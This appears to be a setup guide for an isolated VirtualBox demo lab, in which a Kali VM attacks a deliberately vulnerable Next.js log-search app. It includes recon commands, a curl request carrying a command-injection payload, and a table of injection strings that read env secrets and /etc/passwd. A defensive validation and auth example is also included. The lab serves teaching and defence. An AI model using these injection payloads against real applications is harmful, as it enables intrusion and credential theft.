Presentation demo environment — isolated VirtualBox lab only. All "exploit" output is simulated. No real shell commands execute.
Install Node.js 20 on VM1:

```bash
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs
node -v   # should show v20.x
```

Copy this folder to VM1, then:

```bash
cd react2shell-lab
npm install
npm run dev
```

App will be available at: http://192.168.56.10:3000
Edit /etc/netplan/00-installer-config.yaml:

```yaml
network:
  version: 2
  ethernets:
    enp0s3:
      addresses: [192.168.56.10/24]
```

Then apply: `sudo netplan apply`
| URL | Purpose |
|---|---|
| / | Login page (demo credentials shown) |
| /dashboard | SaaS dashboard — pipelines, metrics |
| /search | Vulnerable log search (main demo) |
| /admin | Exposed admin panel (no auth) |
```bash
# Scan target
nmap -sV 192.168.56.10

# View page source — find Next-Action header
curl -s http://192.168.56.10:3000/search | grep -i "next"
```

- Set Kali browser proxy → 127.0.0.1:8080
- Visit http://192.168.56.10:3000/search
- Submit a search, intercept in Burp
- Show the `Next-Action: <hash>` header
```bash
# Normal search
curl -X POST http://192.168.56.10:3000/search \
  -H "Next-Action: <action-id>" \
  -F "query=error"

# Injection payload (returns simulated RCE output)
curl -X POST http://192.168.56.10:3000/search \
  -H "Next-Action: <action-id>" \
  -F 'query=error"; id #'
```

```bash
curl http://192.168.56.10:3000/admin
# Shows: DB passwords, API keys, JWT secrets, user hashes
```

Show the fixed version — input validation + auth middleware.
Use the Demo Payloads panel on the /search page:

| Payload | Simulated Output |
|---|---|
| `error` | Normal log results |
| `error"; id #` | uid=33(www-data)... |
| `error"; whoami #` | www-data |
| `error"; ls / #` | Filesystem listing |
| `error"; env #` | ENV vars with secrets |
| `error"; cat /etc/passwd #` | /etc/passwd dump |
| `error"; uname -a #` | Kernel info |
| `error"; ps aux #` | Running processes |
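The "fixed version" step above names two controls, input validation and auth middleware. The block below is an added example, not the lab's own code, showing what those two controls look like as plain Node.js functions that a Server Action or route handler could call: an allowlist on the search term that refuses every payload in the Demo Payloads table, an in-memory search that never touches a shell, and an admin gate for /admin. The function names and the sample log lines are hypothetical.

```javascript
// Added example, not the lab's own code. Names and sample data are hypothetical.

// Allowlist: log search terms are words, digits and a few punctuation marks.
// Quotes, ';', '#', '/' and the like never pass, so every payload in the
// Demo Payloads table is refused before it reaches any command or query.
const QUERY_RE = /^[A-Za-z0-9 _.\-:]{1,64}$/;

function validateQuery(query) {
  if (typeof query !== 'string') {
    return { ok: false, reason: 'query must be a string' };
  }
  if (!QUERY_RE.test(query)) {
    return { ok: false, reason: 'query contains disallowed characters or is too long' };
  }
  return { ok: true, query };
}

// Constructed sample log lines standing in for the dashboard's pipeline logs.
const SAMPLE_LOGS = [
  '2024-01-01T10:00:00Z error pipeline build-42 failed',
  '2024-01-01T10:00:05Z info pipeline build-43 started',
  '2024-01-01T10:00:09Z error deploy timeout',
];

// The search is a pure in-memory filter: no shell and no string-built query,
// so a metacharacter has nothing to escape into even if validation were bypassed.
function searchLogs(query, logs = SAMPLE_LOGS) {
  const checked = validateQuery(query);
  if (!checked.ok) return { status: 400, error: checked.reason };
  const needle = checked.query.toLowerCase();
  return { status: 200, results: logs.filter((line) => line.toLowerCase().includes(needle)) };
}

// Auth gate for /admin: the request must carry a session whose role is 'admin'.
// 401 when there is no session at all, 403 when the session is not an admin.
function requireAdmin(req) {
  const role = req && req.session ? req.session.role : undefined;
  if (!role) return { status: 401, error: 'authentication required' };
  if (role !== 'admin') return { status: 403, error: 'admin role required' };
  return { status: 200 };
}

// Stand-alone demo: one normal search and one payload from the table.
console.log(searchLogs('error'));
console.log(searchLogs('error"; id #'));
```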
| VM1 (Target) | VM2 (Kali Attacker) |
|---|---|
| 192.168.56.10 | 192.168.56.11 |
| Ubuntu 22.04 | Kali Linux |
| Next.js :3000 | Burp Suite / curl |

The two VMs talk to each other over the host-only network (192.168.56.10 ←→ 192.168.56.11).

Both VMs: VirtualBox → Settings → Network → Host-Only Adapter → vboxnet0